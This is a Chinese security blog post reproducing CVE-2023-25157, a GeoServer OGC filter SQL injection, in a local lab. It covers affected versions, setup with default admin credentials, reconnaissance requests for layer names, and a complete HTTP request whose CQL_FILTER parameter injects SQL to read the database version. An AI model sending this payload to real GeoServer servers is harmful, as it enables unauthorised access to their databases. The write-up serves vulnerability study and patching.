关注我们❤️,添加星标🌟,一起学安全!
作者:lyc@Timeline Sec
本文字数:1296
阅读时长:2~4min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
0x01 简介
GeoServer是OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作,通过 GeoServer 可以比较容易的在用户之间迅速共享空间地理信息。
0x02 漏洞概述
漏洞编号:CVE-2023-25157
在2.22.1和2.21.4之前版本中,在开放地理空间联盟(OGC)标准定义的过滤器和函数表达式中发现了一个SQL注入问题,未经身份验证的攻击者可以利用该漏洞进行SQL注入,执行恶意代码。
0x03 影响版本
2.19.0<=geoserver<2.19.7
2.20.0<=geoserver<2.20.7
2.21.0<=geoserver<2.21.4
2.22.0<=geoserver<2.22.2
0x04 环境搭建
GeoServer的环境搭建有多种选择,这里下载Windows版。
下载链接:https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.0/GeoServer-2.22.0-winsetup.exe/download
下载好之后,开始安装
安装此服务之前,还需要配置好java环境,否则不能进行下一步的环境安装。
服务的管理员账号密码如下,可以按照默认的来,也可以自行修改。
这里默认设置端口是8080,可能会冲突,可以自己进行配置修改,这里设置端口为9999。
等一切安装完毕之后,GeoServer默认安装路径如下:C:Program FilesGeoServerbin
,点击startup.bat
,运行脚本,脚本运行之后,cmd不要关闭。问。
访问如下网址:http://localhost:9999/geoserver/web/
,这里端口为9999是因为上面配置的时候是9999,真正访问的时候,需要根据自己配置的端口进行访。并且输入上面的账号密码:admin/geoserver,登陆进入Geoserver
成功登陆进入
0x05 漏洞复现
在进行SQL注入漏洞复现之前,首先需要获取地理图层列表信息,这个信息是SQL注入payload中一个必需的参数。
通过以下路径访问,获取地理图层列表信息。
http://192.168.254.170:9999/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities
<Name>
标签中的信息,就是地理图层列表。这里选择ne:populated_places
作为地理图层列表信息
接着访问以下路径,获取图层的属性名称
http://192.168.254.170:9999/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:populated_places&maxFeatures=1&outputFormat=json
最终payload如下:
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1
Host: 192.168.254.170:9999
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=1p6q6kkghu4bg1x04chtdvm369
Connection: close
查询到了数据库的版本信息
0x06 修复方式
官方已经发布最新版本,可以下载更新至最新版本。
参考链接
https://blog.csdn.net/weixin_48539059/article/details/132622485
https://mp.weixin.qq.com/s/5bTlz3MiUU-NUGdvxPfnMg
https://www.freebuf.com/vuls/370086.html
推荐服务
历史漏洞
geoserver-default-login
CVE-2023-43795
CVE-2023-25157
CVE-2022-24816
CVE-2021-40822
后台功能
回复【1】领取新人学习资料
回复【2】进入漏洞查询功能
回复【3】获取加群方式
回复【4】领取安全电子书籍
回复【5】进入SRC-QQ交流群
商务合作
原文始发于微信公众号(Timeline Sec):CVE-2023-25157:GeoServer OGC Filter SQL注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论